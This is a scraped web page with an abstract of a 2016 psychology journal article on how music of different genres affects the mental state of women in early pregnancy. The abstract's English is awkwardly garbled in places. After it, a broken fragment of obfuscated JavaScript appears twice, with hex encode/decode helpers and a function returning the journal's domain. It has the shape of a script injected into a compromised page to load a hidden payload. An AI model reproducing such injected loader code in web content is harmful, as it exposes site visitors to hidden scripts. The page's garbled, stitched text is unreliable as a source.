Music influence on the mental state of pregnant women (The Journal of Psychology and Sociology, 2016)
This article analyzes the influence of music of different genres on the mental health of women who are pregnant in the first trimester. The article describes the history of the study of this issue, from the point of view of psychology. In general, developed theoreti cal apparatus of scientific research problems of establishing mental states through mu sic. This problem is studied medicine, cultural studies, musicology and aesthetics, but for full disclosure, in our view, require a multidisciplinary approach, in which a signifi cant contribution can have a psychology. At the same time, fundraising art, in particular, music has long been considered a gentle and effective way to influence the mental state of women, resulting in a decrease in the level of anxiety, improve mood and well be ing, increased activity, adaptive capacity, intrauterine mental development of children as well as increase the psychological readiness for successful delivery. Features music perception pregnant women depend primarily on the mental state at the time of per ception and to a lesser extent – from private properties. This problem is considered not only in psychology, but also in art pedagogy, which develops applications points in this direction. This article discusses the effects of music on the emotional state and mental health of pregnant women. Thus, the main object of study of our theoretical research is the influence of music on the mental health of pregnant women, the state of which depends on the formation of a complete nervous system of infants, and the whole future of the physical and mental health of the child. As a result, together with the relevance, outlined ways of further applied research to this problem.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Keywords: pregnant women; mental conditions; exposure to music; music psychology.